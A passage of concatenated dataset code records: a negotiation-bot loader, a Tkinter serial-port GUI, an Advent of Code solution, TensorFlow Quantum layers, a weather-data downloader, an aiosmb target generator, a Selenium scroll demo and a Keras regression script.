PytorchNeuralSystem(\n args, schema, price_tracker, self.MODEL_PATH, False\n )\n\n # load scenario db\n with open(self.DATA_PATH) as f:\n raw = json.load(f)\n raw = [r[\"scenario\"] for r in raw] # HACK\n self.scenario_db = ScenarioDB.from_dict(schema, raw, Scenario)\n\n def from_uuid(self, agent, uuid):\n \"\"\"Return a session object given a uuid and agent number\"\"\"\n scenario = self.scenario_db.get(uuid)\n kb = scenario.get_kb(agent)\n return scenario, self.system.new_session(agent, kb), kb\n\n\nif __name__ == \"__main__\":\n from sessions.cmd_session import CmdSession\n from core.controller import Controller\n loader = Loader()\n scenario, session, kb = loader.from_uuid(0, \"S_To118PXuNicOd8SO\")\n cmd_session = CmdSession(1, kb)\n controller = Controller(scenario, [session, cmd_session])\n controller.simulate()\n","sub_path":"craigslistbargain/load.py","file_name":"load.py","file_ext":"py","file_size_in_byte":3066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"241206596","text":"from tkinter import Frame, LabelFrame, Tk, Menu, OptionMenu, StringVar\nfrom tkinter.ttk import Button, Style\nfrom ctypes import windll\nimport platform\nfrom screeninfo import get_monitors\nfrom threading import Thread\nfrom queue import Queue\nimport queue\nimport serial\nimport sys\nimport glob\n\nfont_h1 = 'Corbel 14 bold'\nfont_h2 = 'Corbel 14 '\nfont_body = 'Corbel 12'\n\n\ndef buscarPuertos():\n \"\"\" Lists serial port names\n\n :raises EnvironmentError:\n On unsupported or unknown platforms\n :returns:\n A list of the serial ports available on the system\n \"\"\"\n if sys.platform.startswith('win'):\n ports = ['COM%s' % (i + 1) for i in range(256)]\n elif sys.platform.startswith('linux') or sys.platform.startswith('cygwin'):\n # this excludes your current terminal \"/dev/tty\"\n ports = glob.glob('/dev/tty[A-Za-z]*')\n elif sys.platform.startswith('darwin'):\n ports = glob.glob('/dev/tty.*')\n else:\n raise EnvironmentError('Unsupported platform')\n\n result = []\n for port in ports:\n 
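# a port counts as available when it can be opened and closed without raising\n        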
try:\n s = serial.Serial(port)\n s.close()\n result.append(port)\n except (OSError, serial.SerialException):\n pass\n return result\n\n\nclass Frontend:\n def __init__(self, master, event):\n self.master = master\n self.event = event\n self.opciones_de_puerto = ['-']\n operatingSystem = platform.system()\n if operatingSystem == 'Windows':\n release = platform.release()\n if release == '7':\n windll.user32.SetProcessDPIAware(1) # Windows 7 y vista\n elif release == '10' or '8':\n windll.shcore.SetProcessDpiAwareness(1) # Windows 10 y 8\n\n self.master.title(\"GUI: Gimbal 2DOF\")\n rootWidth = int(screenWidth * 0.4)\n rootHeight = int(screenHeight * 0.8)\n posWidth = (screenWidth - rootWidth) // 2\n posHeight = (screenHeight - rootHeight) // 2\n self.master.geometry(f\"{rootWidth}x{rootHeight}+{posWidth}+{posHeight}\")\n # TODO: CREACIÓN DE WIDGETS:\n # ------------------------------------------ PLOT1\n self.plot1_label_frame = LabelFrame(\n self.master,\n text='Variables reguladas',\n font=font_h1,\n fg='#267eb5'\n )\n # ------------------------------------------ PLOT2\n self.plot2_label_frame = LabelFrame(\n self.master,\n text='Acciones de control',\n font=font_h1,\n fg='#267eb5'\n )\n # ------------------------------------------ BOTÓN\n self.style_button = Style()\n self.style_button.configure(\n 'style_button.TButton',\n foreground='#267eb5',\n font=font_h2,\n relief=\"flat\",\n background=\"#ccc\"\n )\n # ------------------------------------------ CONFIGURACION\n self.frame_config = Frame(self.master)\n self.conectar_button = Button(\n self.frame_config,\n text='Conectar',\n style='style_button.TButton',\n command=lambda: event_queue.put('CONECTAR')\n )\n self.puerto_seleccionado = StringVar()\n self.puerto_seleccionado.set('Puertos')\n self.puertos_optionMenu = OptionMenu(\n self.frame_config,\n self.puerto_seleccionado,\n *self.opciones_de_puerto\n )\n\n # TODO: MAQUETADO DE WIDGETS:\n self.plot1_label_frame.pack(\n fill='both',\n expand=1,\n anchor='center',\n padx=10,\n pady=(10, 5)\n )\n self.plot2_label_frame.pack(\n fill='both',\n expand=1,\n anchor='center',\n padx=10,\n pady=(5, 10)\n )\n self.frame_config.pack(\n padx=5,\n pady=(5, 10)\n )\n self.conectar_button.grid(row=0, column=0)\n self.puertos_optionMenu.grid(row=0, column=1)\n\n def crearPuerto(self, puerto):\n print('puerto CREADO')\n menu = self.puertos_optionMenu['menu']\n menu.add_command(\n label=puerto,\n command=lambda puerto=puerto: self.puerto_seleccionado.set(puerto)\n )\n\n def eliminarPuerto(self, puerto):\n print('puerto ELIMINADO')\n menu = self.puertos_optionMenu['menu']\n last = menu.index(\"end\")\n items = []\n for index in range(last + 1):\n items.append(menu.entrycget(index, \"label\"))\n pos = items.index(puerto)\n menu.delete(pos)\n\n\ndef Backend(gui):\n mainMenu = ''\n puertos_creados = []\n while True:\n try:\n event = event_queue.get(timeout=0.001)\n except queue.Empty:\n pass\n\n else:\n print(event)\n\n puertos_encontrados = buscarPuertos()\n for puerto in puertos_encontrados:\n if not puerto in puertos_creados:\n puertos_creados.append(puerto)\n gui.crearPuerto(puerto)\n\n cant_puertos_encontrados = len(puertos_encontrados)\n cant_puertos_creados = len(puertos_creados)\n if cant_puertos_creados != cant_puertos_encontrados:\n for puerto in puertos_creados:\n if not puerto in puertos_encontrados:\n pos = puertos_creados.index(puerto)\n puertos_creados.pop(pos)\n gui.eliminarPuerto(puerto)\n\n print(f\"puertos creados {puertos_creados}, var:{gui.puerto_seleccionado.get()}\")\n\n\nif __name__ == 
'__main__':\n get_monitors()\n root = Tk()\n root.attributes('-topmost', 1)\n screenWidth = root.winfo_screenwidth()\n screenHeight = root.winfo_screenheight()\n event_queue = Queue()\n UI = Frontend(root, event_queue)\n th = Thread(target=Backend, args=(UI,))\n th.daemon = True\n th.start()\n root.mainloop()\n","sub_path":"GUI_.py","file_name":"GUI_.py","file_ext":"py","file_size_in_byte":5897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"498473429","text":"def read_input_paths(filename):\n paths = []\n for line in open(filename).readlines():\n paths.append(line.strip().split(\",\"))\n return paths\n\n\n# Calculate the change in location on both the horizontal and vertical\n# axes caused by a step instruction (e.g. R29)\ndef calculate_delta_distances(step):\n direction = step[0]\n magnitude = int(step[1:])\n dx = dy = 0\n\n if direction == \"R\":\n dx = magnitude\n elif direction == \"L\":\n dx = -magnitude\n elif direction == \"U\":\n dy = magnitude\n elif direction == \"D\":\n dy = -magnitude\n\n return (dx, dy)\n\n\n# Calculate the integer values between two points\ndef calculate_nums_between(x0, x1):\n direction = -1 if x0 > x1 else 1\n return list(range(x0 + direction, x1, direction))\n\n\n# Calculate the 2D coordinates between two points\ndef calculate_joining_coords(p0, p1):\n joining_coords = []\n # If the x-value is not the same...\n if p0[0] != p1[0]:\n for x in calculate_nums_between(p0[0], p1[0]):\n joining_coords.append((x, p0[1]))\n else:\n for y in calculate_nums_between(p0[1], p1[1]):\n joining_coords.append((p0[0], y))\n return joining_coords\n\n\nBASE_POINT = (0, 0)\n\n\n# Calculate all line coordinates from a sequence of steps\n# i.e a 'path'\ndef calculate_line_coordinates(path):\n # The 2D coordinates at the ends of each line\n points = [BASE_POINT]\n # The 2D coordinates in between each point\n segments = []\n for i, step in enumerate(path):\n deltas = calculate_delta_distances(step)\n current_point = points[i]\n next_point = (current_point[0] + deltas[0], current_point[1] + deltas[1])\n segments.append(calculate_joining_coords(current_point, next_point))\n points.append(next_point)\n\n # Joining points and segments in order of step sequence\n all_coords = [BASE_POINT]\n for i, point in enumerate(points[1:]):\n for coord in segments[i]:\n all_coords.append(coord)\n all_coords.append(point)\n return all_coords\n\n\nclass Wire:\n def __init__(self, path):\n self.coords = calculate_line_coordinates(path)\n\n\n# Calculates the points that are shared between two wires\ndef get_intersections(wire0, wire1):\n intersects = list(set(wire0.coords).intersection(set(wire1.coords)))\n intersects.remove(BASE_POINT)\n return intersects\n\n\n# Calculates the amount of steps taken by both wires to reach a\n# certain intersection\ndef get_combined_steps(wire0, wire1, intersection):\n return wire0.coords.index(intersection) + wire1.coords.index(intersection)\n\n\n# Calculates the intersection between two wires that has the shortest\n# amount of combined steps to reach\ndef get_closest_step_intersection(wire0, wire1):\n intersections = get_intersections(wire0, wire1)\n # Initialise the closest step count as that of the first intersection\n closest_steps = get_combined_steps(wire0, wire1, intersections[0])\n for intersect in intersections[1:]:\n steps = get_combined_steps(wire0, wire1, intersect)\n if steps < closest_steps:\n closest_steps = steps\n return closest_steps\n\n\nWIRES = []\nfor path in 
read_input_paths(\"res/day_three_inputs.txt\"):\n WIRES.append(Wire(path))\nprint(get_closest_step_intersection(WIRES[0], WIRES[1]))\n","sub_path":"src/day_three.py","file_name":"day_three.py","file_ext":"py","file_size_in_byte":3294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"158893717","text":"import uuid\nimport os\n\nclass Args:\n \"\"\"args for NAPS\"\"\"\n\n def __init__(self, instance_path, form):\n self.directory = os.path.join(instance_path, 'tmp_' + str(uuid.uuid4()))\n self.shift_file = os.path.join(self.directory, 'shift.txt')\n self.pred_file = os.path.join(self.directory, 'pred.txt')\n self.output_file = os.path.join(self.directory, 'output.txt')\n self.plot_file = os.path.join(self.directory, 'plot.png')\n self.shift_type = form['shift_type'].strip().lower()\n self.pred_type = form['pred_type'].strip().lower()\n\n def argsToList(self):\n return [\n self.shift_file,\n self.pred_file,\n self.output_file,\n '--shift_type', self.shift_type,\n '--pred_type', self.pred_type,\n '--plot_file', self.plot_file,\n '-c', '../config/config.txt',\n #'-l', '../output/test.log'\n ]","sub_path":"webApp/args.py","file_name":"args.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"283165614","text":"import numbers\n\nimport cirq\nimport numpy as np\nimport sympy\nimport tensorflow as tf\n\nimport tensorflow_quantum as tfq\nfrom tensorflow_quantum.core.ops import tfq_unitary_op\nfrom tensorflow_quantum.python import util\nfrom tensorflow_quantum.python.layers.circuit_construction import elementary\nfrom tensorflow_quantum.python.layers.circuit_executors import (\n expectation, input_checks, sampled_expectation)\n\n\nclass HybridControlledPQC(tf.keras.layers.Layer):\n \"\"\"Hybrid Controlled Parametrized Quantum Circuit (PQC) Layer.\"\"\"\n\n def __init__(self,\n model_circuit,\n operators,\n *,\n controlled_symbol_names=None,\n native_symbol_names=None,\n repetitions=None,\n backend=None,\n initializer=tf.keras.initializers.RandomUniform(0, 2 * np.pi),\n regularizer=None,\n constraint=None,\n differentiator=None,\n **kwargs):\n \"\"\"Instantiate this layer.\n Create a layer that will output expectation values of the given\n operators when fed quantum data to it's input layer. This layer will\n take two input tensors, one representing a quantum data source (these\n circuits must not contain any symbols) and the other representing\n control parameters for the model circuit that gets appended to the\n datapoints.\n model_circuit: `cirq.Circuit` containing `sympy.Symbols` that will be\n used as the model which will be fed quantum data inputs.\n operators: `cirq.PauliSum` or Python `list` of `cirq.PauliSum` objects\n used as observables at the end of the model circuit.\n repetitions: Optional Python `int` indicating how many samples to use\n when estimating expectation values. If `None` analytic expectation\n calculation is used.\n backend: Optional Backend to use to simulate states. 
Defaults to\n the native TensorFlow simulator (None), however users may also\n specify a preconfigured cirq simulation object to use instead.\n If a cirq object is given it must inherit `cirq.SimulatesFinalState`\n if `sampled_based` is True or it must inherit `cirq.Sampler` if\n `sample_based` is False.\n differentiator: Optional `tfq.differentiator` object to specify how\n gradients of `model_circuit` should be calculated.\n \"\"\"\n super().__init__(**kwargs)\n # Ingest model_circuit.\n if not isinstance(model_circuit, cirq.Circuit):\n raise TypeError(\"model_circuit must be a cirq.Circuit object.\"\n \" Given: \".format(model_circuit))\n self._symbols_list = list(\n sorted(util.get_circuit_symbols(model_circuit)))\n\n# self._native_symbols_list = list(sorted(controlled_symbol_names))\n# self._controlled_symbols_list = list(sorted(native_symbol_names))\n# self._native_symbols = tf.constant([str(x) for x in self._native_symbols_list])\n# self._controlled_symbols = tf.constant([str(x) for x in self._controlled_symbols_list])\n\n self._symbols = tf.constant(\n [str(x) for x in native_symbol_names + controlled_symbol_names])\n\n self._circuit = util.convert_to_tensor([model_circuit])\n\n if len(self._symbols_list) == 0:\n raise ValueError(\"model_circuit has no sympy.Symbols. Please \"\n \"provide a circuit that contains symbols so \"\n \"that their values can be trained.\")\n\n # Ingest operators.\n if isinstance(operators, (cirq.PauliString, cirq.PauliSum)):\n operators = [operators]\n\n if not isinstance(operators, (list, np.ndarray, tuple)):\n raise TypeError(\"operators must be a cirq.PauliSum or \"\n \"cirq.PauliString, or a list, tuple, \"\n \"or np.array containing them. \"\n \"Got {}.\".format(type(operators)))\n if not all([\n isinstance(op, (cirq.PauliString, cirq.PauliSum))\n for op in operators\n ]):\n raise TypeError(\"Each element in operators to measure \"\n \"must be a cirq.PauliString\"\n \" or cirq.PauliSum\")\n\n self._operators = util.convert_to_tensor([operators])\n\n # Ingest and promote repetitions.\n self._analytic = False\n if repetitions is None:\n self._analytic = True\n\n if not self._analytic and not isinstance(\n repetitions, numbers.Integral):\n raise TypeError(\"repetitions must be a positive integer value.\"\n \" Given: \".format(repetitions))\n\n if not self._analytic and repetitions <= 0:\n raise ValueError(\"Repetitions must be greater than zero.\")\n\n if not self._analytic:\n self._repetitions = tf.constant(\n [[repetitions for _ in range(len(operators))]],\n dtype=tf.dtypes.int32)\n\n if not isinstance(\n backend,\n cirq.Sampler) and repetitions is not None and backend is not None:\n raise TypeError(\"provided backend does not inherit cirq.Sampler \"\n \"and repetitions!=None. Please provide a backend \"\n \"that inherits cirq.Sampler or set \"\n \"repetitions=None.\")\n\n if not isinstance(backend, cirq.SimulatesFinalState\n ) and repetitions is None and backend is not None:\n raise TypeError(\"provided backend does not inherit \"\n \"cirq.SimulatesFinalState and repetitions=None. 
\"\n \"Please provide a backend that inherits \"\n \"cirq.SimulatesFinalState.\")\n\n # Ingest backend and differentiator.\n if self._analytic:\n self._layer = expectation.Expectation(\n backend=backend, differentiator=differentiator)\n else:\n self._layer = sampled_expectation.SampledExpectation(\n backend=backend, differentiator=differentiator)\n\n self._append_layer = elementary.AddCircuit()\n\n # create weights for only native symbols\n\n if not all(\n name in self._symbols_list for name in controlled_symbol_names):\n raise ValueError(\n \"model_circuit does not contain all controlled symbol names \")\n\n # Set additional parameter controls.\n self.initializer = tf.keras.initializers.get(initializer)\n self.regularizer = tf.keras.regularizers.get(regularizer)\n self.constraint = tf.keras.constraints.get(constraint)\n\n # Weight creation is not placed in a Build function because the number\n # of weights is independent of the input shape.\n self._native_symbol_values = self.add_weight(\n 'parameters',\n shape=(\n len(native_symbol_names),\n ),\n initializer=self.initializer,\n regularizer=self.regularizer,\n constraint=self.constraint,\n dtype=tf.float32,\n trainable=True)\n\n @property\n def symbols(self):\n \"\"\"The symbols that are managed by this layer (in-order).\n Note: `symbols[i]` indicates what symbol name the managed variables in\n this layer map to.\n \"\"\"\n return [sympy.Symbol(x) for x in self._symbols_list]\n\n def symbol_values(self):\n \"\"\"Returns a Python `dict` containing symbol name, value pairs.\n Returns:\n Python `dict` with `str` keys and `float` values representing\n the current symbol values.\n \"\"\"\n return dict(zip(self.symbols, self.get_weights()[0]))\n\n def build(self, input_shape):\n \"\"\"Keras build function.\"\"\"\n super().build(input_shape)\n\n def call(self, controlled_symbol_values):\n \"\"\"Keras call function.\"\"\"\n circuit_batch_dim = tf.gather(tf.shape(controlled_symbol_values), 0)\n tiled_up_model = tf.tile(self._circuit, [circuit_batch_dim])\n tiled_up_operators = tf.tile(self._operators, [circuit_batch_dim, 1])\n tiled_up_native_symbol_values = tf.tile(\n [self._native_symbol_values], [circuit_batch_dim, 1])\n symbol_values = tf.concat(\n [tiled_up_native_symbol_values, controlled_symbol_values], 1)\n # tiled_up_parameters = tf.tile(symbol_values, [circuit_batch_dim, 1])\n\n if self._analytic:\n return self._layer(tiled_up_model,\n symbol_names=self._symbols,\n symbol_values=symbol_values,\n operators=tiled_up_operators)\n else:\n tiled_up_repetitions = tf.tile(self._repetitions,\n [circuit_batch_dim, 1])\n return self._layer(tiled_up_model,\n symbol_names=self._symbols,\n symbol_values=symbol_values,\n operators=tiled_up_operators,\n repetitions=tiled_up_repetitions)\n\n\nclass Unitary(tf.keras.layers.Layer):\n\n def __init__(self, **kwargs):\n \"\"\"Instantiate a Unitary Layer.\n Create a layer that will calculate circuit unitary matrices and output\n them into the TensorFlow graph given a correct set of inputs.\n \"\"\"\n super().__init__(**kwargs)\n self.unitary_op = tfq_unitary_op.get_unitary_op()\n self._w = None\n\n @tf.function\n def call(self, inputs,\n *,\n symbol_names=None,\n symbol_values=None,\n initializer=tf.keras.initializers.RandomUniform(0, 2 * np.pi)):\n \"\"\"Keras call function.\n Input options:\n `inputs`, `symbol_names`, `symbol_values`:\n see `input_checks.expand_circuits`\n Output shape:\n `tf.RaggedTensor` with shape:\n [batch size of symbol_values, , ]\n or\n [number of circuits, , ]\n \"\"\"\n\n 
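# The branch below gives this layer two modes of operation: when the caller
# passes no symbol_values, a single trainable weight vector (one entry per
# symbol name) is created lazily on the first call and tiled across the
# batch, so the same Unitary layer can either evaluate caller-supplied
# parameters or manage its own trainable ones.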
values_empty = False\n if symbol_values is None:\n values_empty = True\n\n inputs, symbol_names, symbol_values = input_checks.expand_circuits(\n inputs, symbol_names, symbol_values)\n\n circuit_batch_dim = tf.gather(tf.shape(inputs), 0)\n\n if values_empty:\n # No symbol_values were provided. So we assume the user wants us\n # to create and manage variables for them. We will do so by\n # creating a weights variable and tiling it up to appropriate\n # size of [batch, num_symbols].\n\n if self._w is None:\n # don't re-add variable.\n self._w = self.add_weight(name='circuit_learnable_parameters',\n shape=symbol_names.shape,\n initializer=initializer)\n\n symbol_values = tf.tile(tf.expand_dims(self._w, axis=0),\n tf.stack([circuit_batch_dim, 1]))\n\n unitary = self.unitary_op(inputs, symbol_names, symbol_values)\n return unitary.to_tensor()\n\n\nclass QSP(tf.keras.layers.Layer):\n \"\"\" QSP for \"\"\"\n\n def __init__(self, poly_deg=0, **kwargs):\n super().__init__(**kwargs)\n self.q = cirq.GridQubit(0, 0)\n self.poly_deg = poly_deg\n self.symbol_names = [sympy.Symbol(f'phi{k}') for k in range(\n poly_deg + 1)] + [sympy.Symbol(f'th')]\n\n initializer = tf.keras.initializers.RandomUniform(0, 2 * np.pi)\n\n self.phi = self.add_weight(name='circuit_learnable_parameters',\n shape=(poly_deg + 1,),\n initializer=initializer)\n\n @tf.function\n def call(self, theta_inp):\n \"\"\"Keras call function.\n Input options:\n `inputs`, `symbol_names`, `symbol_values`:\n see `input_checks.expand_circuits`\n Output shape:\n `tf.RaggedTensor` with shape:\n [batch size of symbol_values, , ]\n or\n [number of circuits, , ]\n \"\"\"\n\n wx = cirq.Circuit(cirq.rx(2 * theta_inp))\n self.rot_zs = [cirq.Circuit(cirq.rz(2 * self.phi[k])(self.q))\n for k in range(self.poly_deg)]\n\n full_circuit = self.rot_zs[0]\n full_circuit_test = cirq.Circuit(\n cirq.rz(2 * self.symbol_names[0])(self.q),\n cirq.rx(2 * self.symbol_names[-1])(self.q),\n cirq.rz(2 * self.symbol_names[0])(self.q)\n )\n\n phi_values = tf.expand_dims(self.phi, axis=0)\n symbol_values = tf.expand_dims(tf.concat([self.phi, [4]], 0), 0)\n\n tensor_full_circuit_test = tfq.convert_to_tensor([full_circuit_test])\n tfq.from_tensor(tfq.resolve_parameters(\n tensor_full_circuit_test, self.symbol_names, symbol_values))\n\n return full_circuit_test.unitary()[0, 0]\n","sub_path":"pyqsp/qsp_models/tfq_qsp_layers.py","file_name":"tfq_qsp_layers.py","file_ext":"py","file_size_in_byte":13289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"376077988","text":"\"\"\"\nhandle download of nwp from remote servers\n\"\"\"\nfrom pathlib import Path\nfrom urllib.request import urlopen\nfrom io import BytesIO\nfrom typing import Dict, List, Tuple\nfrom concurrent.futures import ThreadPoolExecutor, ProcessPoolExecutor\n\n\nfrom src.enumerations.weather_models import WeatherModels\nfrom src.modules.download.local_store import bunzip_store, store, tarfile_store\nfrom src.modules.config.constants import KEY_LOCAL_FILE_PATHS, \\\n KEY_REMOTE_FILE_PATHS, KEY_COMPRESSION, KEY_REMOTE_SERVER_TYPE\nfrom src.modules.config.configurations import MODEL_CONFIG\n\nDEFAULT_NUMBER_OF_PARALLEL_PROCESSES = 2\n\n\ndef download(\n weather_model: WeatherModels,\n model_file_lists: Dict[str, List[Path]],\n parallel_download: bool = False,\n n_processes: int = DEFAULT_NUMBER_OF_PARALLEL_PROCESSES\n) -> None:\n \"\"\"\n download weather forecasts\n \"\"\"\n if weather_model == WeatherModels.HARMONIE_KNMI:\n __download_tar_file(weather_model,\n 
model_file_lists[KEY_REMOTE_FILE_PATHS][0],\n model_file_lists[KEY_LOCAL_FILE_PATHS])\n return None\n\n if parallel_download:\n download_specifications = \\\n [(weather_model, local_file_path, remote_file)\n for remote_file, local_file_path in\n zip(model_file_lists[KEY_REMOTE_FILE_PATHS],\n model_file_lists[KEY_LOCAL_FILE_PATHS])]\n __download_parallel(download_specifications, n_processes)\n else:\n for remote_file, local_file_path in zip(model_file_lists[KEY_REMOTE_FILE_PATHS],\n model_file_lists[KEY_LOCAL_FILE_PATHS]):\n __download((weather_model, local_file_path, remote_file))\n\n\ndef __download(\n download_specification: Tuple[WeatherModels, Path, Path]\n) -> None:\n \"\"\"\n base download function to manage single file download\n\n Args:\n download_specification: Tuple with\n - WeatherModels\n - local_file_path\n - remote_file_path\n\n Returns:\n Stores a file in temporary directory\n \"\"\"\n weather_model = download_specification[0].value\n downloaded_file = urlopen(\n f\"{MODEL_CONFIG[weather_model][KEY_REMOTE_SERVER_TYPE]}:\"\n f\"//{download_specification[2]}\")\n\n if not download_specification[1].parent.is_dir():\n # parents/exist_ok guard against missing intermediate directories and\n # against the race when several parallel downloads share one target dir\n download_specification[1].parent.mkdir(parents=True, exist_ok=True)\n\n if MODEL_CONFIG[weather_model][KEY_COMPRESSION] == 'bz2':\n bunzip_store(BytesIO(downloaded_file.read()), download_specification[1])\n else:\n store(downloaded_file, download_specification[1])\n\n\ndef __download_parallel(\n download_specifications: List[Tuple[WeatherModels, Path, Path]],\n n_processes: int = DEFAULT_NUMBER_OF_PARALLEL_PROCESSES) -> None:\n \"\"\"\n Script to run download in parallel\n Args:\n download_specifications: List of Tuple with\n - WeatherModels\n - local_file_path\n - remote_file_path\n n_processes: Number of parallel processes used for download\n Returns:\n None\n \"\"\"\n with ThreadPoolExecutor(max_workers=n_processes) as executor:\n executor.map(__download, download_specifications)\n\n executor.shutdown(wait=True)\n\n\ndef __download_tar_file(\n weather_model: WeatherModels,\n remote_file: Path,\n local_file_list: List[Path]\n) -> None:\n \"\"\"\n Downloads a weather forecast package with one tar archive\n Args:\n weather_model:\n remote_file:\n local_file_list:\n\n Returns:\n\n \"\"\"\n downloaded_file = urlopen(\n f\"{MODEL_CONFIG[weather_model.value][KEY_REMOTE_SERVER_TYPE]}:\"\n f\"//{remote_file}\")\n tarfile_store(downloaded_file, local_file_list)\n","sub_path":"src/modules/download/download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":3748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"17088900","text":"\n\nimport asyncio\nimport uuid\n\n\nclass ListTargetGen:\n\tdef __init__(self, targets):\n\t\tself.targets = targets\n\n\tasync def run(self, target_q):\n\t\ttry:\n\t\t\tcnt = 0\n\t\t\tfor target in self.targets:\n\t\t\t\tcnt += 1\n\t\t\t\tawait target_q.put((str(uuid.uuid4()),target))\n\t\t\t\tawait asyncio.sleep(0)\n\t\t\treturn cnt, None\n\t\texcept Exception as e:\n\t\t\treturn cnt, e","sub_path":"aiosmb/commons/scanner/targetgen/listtarget.py","file_name":"listtarget.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +
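ListTargetGen above simply tags each target with a uuid4 string and feeds an asyncio queue, so it is easy to exercise in isolation. A minimal driver sketch, assuming the class is importable; the target addresses are made up:

import asyncio

async def main():
    gen = ListTargetGen(['10.0.0.1', '10.0.0.2', '10.0.0.3'])  # made-up targets
    target_q = asyncio.Queue()
    total, err = await gen.run(target_q)
    print(total, err)  # 3 None on success; err carries the exception otherwise
    while not target_q.empty():
        tid, target = target_q.get_nowait()
        print(tid, target)  # each target arrives tagged with a fresh uuid4 string

asyncio.run(main())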
{"seq_id":"614874665","text":"# Scrolling the browser scroll bar\r\n# WebDriver provides the execute_script() method to run JavaScript code\r\n# Usage: window.scrollTo(x,y):\r\n# the first argument x is the horizontal offset from the left; the second argument y is the vertical offset from the top.\r\nfrom selenium import webdriver\r\nfrom time import sleep\r\n\r\n# visit Baidu\r\nd=webdriver.Chrome()\r\nd.get(\"http://www.baidu.com\")\r\n\r\n# set the browser window size\r\nd.set_window_size(600,600)\r\n\r\n# search\r\nd.find_element_by_id(\"kw\").send_keys(\"邓辉\")\r\n\r\nsleep(2)\r\n\r\n# set the browser window's scroll bar position via JavaScript\r\ndenghui=\"window.scrollTo(100,450);\"\r\nd.execute_script(denghui)\r\nsleep(3)\r\n\r\n\r\nd.quit()\r\n","sub_path":"day00jichu/execute_script.py","file_name":"execute_script.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"59045006","text":"import numpy as np\r\nimport tensorflow as tf\r\nimport csv\r\nfrom tensorflow.keras.layers import *\r\nfrom tensorflow.keras.models import Sequential\r\nfrom tensorflow.keras.initializers import Constant\r\nfrom tensorflow.keras.initializers import RandomUniform\r\nfrom tensorflow.keras import backend as K\r\nfrom sklearn import linear_model\r\nimport matplotlib.pyplot as plt\r\nfrom tensorflow.keras.layers import LeakyReLU\r\nfrom sklearn.model_selection import train_test_split\r\nfrom tensorflow.keras.metrics import RootMeanSquaredError\r\nfrom tensorflow.keras.optimizers import Adam\r\nfrom sklearn.metrics import r2_score\r\n# final model for the moment coefficient\r\n# all the file links must be changed\r\n\r\n# gives a plot for the prediction quality\r\ndef plot_prediction(y_test, y_pred):\r\n a = plt.axes(aspect='equal')\r\n lims = [0, 0.025]\r\n y_test = y_test[:, 0]\r\n y_pred = y_pred[:]\r\n #linear regression through the predicted values and the true values\r\n regr = linear_model.LinearRegression()\r\n y_pred_fit = np.reshape(y_pred, newshape=(-1,1))\r\n y_test_fit = np.reshape(y_test, newshape=(-1,1))\r\n #calculating the r2-score\r\n regr.fit(y_test_fit, y_pred_fit)\r\n #coefficients for the linear regression\r\n r2 = r2_score(y_test_fit, y_pred_fit)\r\n a = regr.intercept_\r\n b = regr.coef_[0]\r\n y_pred_lin = []\r\n for i in lims:\r\n y_pred_lin.append(b*i + a)\r\n #creating the actual plot\r\n plt.xlim(lims)\r\n plt.ylim(lims)\r\n plt.scatter(y_test, y_pred, color = \"lightskyblue\")\r\n plt.xlabel('True Values [MPG]')\r\n plt.ylabel('Predictions [MPG]')\r\n plt.plot(lims, lims, label = \"true_val\", color = \"blue\")\r\n plt.grid(True)\r\n plt.plot(lims, y_pred_lin, label = \"pred_val\", linestyle = \"--\", color = \"orange\")\r\n plt.legend()\r\n plt.show()\r\n print(f\"R2-Value: {r2}\")\r\n\r\n# creates a plot for the loss function -> development of the loss over time\r\ndef plot_loss(history):\r\n plt.plot(history.history['loss'], label='loss')\r\n plt.plot(history.history['val_loss'], label='val_loss')\r\n plt.ylim([0, 0.01])\r\n plt.xlabel('Epoch')\r\n plt.ylabel('Error [MAE]')\r\n plt.legend()\r\n plt.grid(True)\r\n plt.show()\r\n\r\n# loads the dataset\r\ndef getDataset():\r\n # data from the Database:\r\n # Bouhlel, M. A., He, S., and Martins, J. R. R. A., “mSANN Model Benchmarks,” Mendeley Data, 2019. 
https://doi.org/10.17632/ngpd634smf.1\r\n # all the Subsonic moment coefficient data was put into one csv file\r\n with open('Subsonic/dataKerasCd.csv', 'r') as file:\r\n reader = csv.reader(file, delimiter=\";\")\r\n values = np.array(list(reader), dtype = np.float32)\r\n dim_values = values.shape\r\n x = values[:,:dim_values[1]-1]\r\n y = values[:,-1]\r\n return x, y\r\n\r\n# builds the model\r\ndef build_model(num_features: int, num_targets: int) -> Sequential:\r\n #randomly initilaizes the weight and bias in a predetermined range\r\n init_w = RandomUniform(minval=0.0, maxval=0.1)\r\n init_b = Constant(value=0.0)\r\n\r\n model = Sequential()\r\n model.add(Dense(units=180, kernel_initializer=init_w, bias_initializer=init_b, input_shape = (num_features,)))\r\n model.add(Activation(\"tanh\"))\r\n model.add(Dense(units=160, kernel_initializer=init_w, bias_initializer=init_b))\r\n model.add(Activation(\"sigmoid\"))\r\n model.add(Dense(units=140, kernel_initializer=init_w, bias_initializer=init_b))\r\n model.add(Activation(\"selu\"))\r\n model.add(Dense(units=140, kernel_initializer=init_w, bias_initializer=init_b))\r\n model.add(Activation(\"selu\"))\r\n model.add(Dense(units=140, kernel_initializer=init_w, bias_initializer=init_b))\r\n model.add(Activation(\"selu\"))\r\n model.add(Dense(units=120, kernel_initializer=init_w, bias_initializer=init_b))\r\n model.add(LeakyReLU(alpha = 0.3))\r\n model.add(Dense(units=120, kernel_initializer=init_w, bias_initializer=init_b))\r\n model.add(LeakyReLU(alpha = 0.3))\r\n model.add(Dense(units=120, kernel_initializer=init_w, bias_initializer=init_b))\r\n model.add(LeakyReLU(alpha = 0.3))\r\n model.add(Dense(units=num_targets, kernel_initializer=init_w, bias_initializer=init_b))\r\n model.summary()\r\n\r\n return model\r\n\r\nif __name__ == \"__main__\":\r\n #obtaining of the input and the output from the dataset\r\n x, y = getDataset()\r\n y 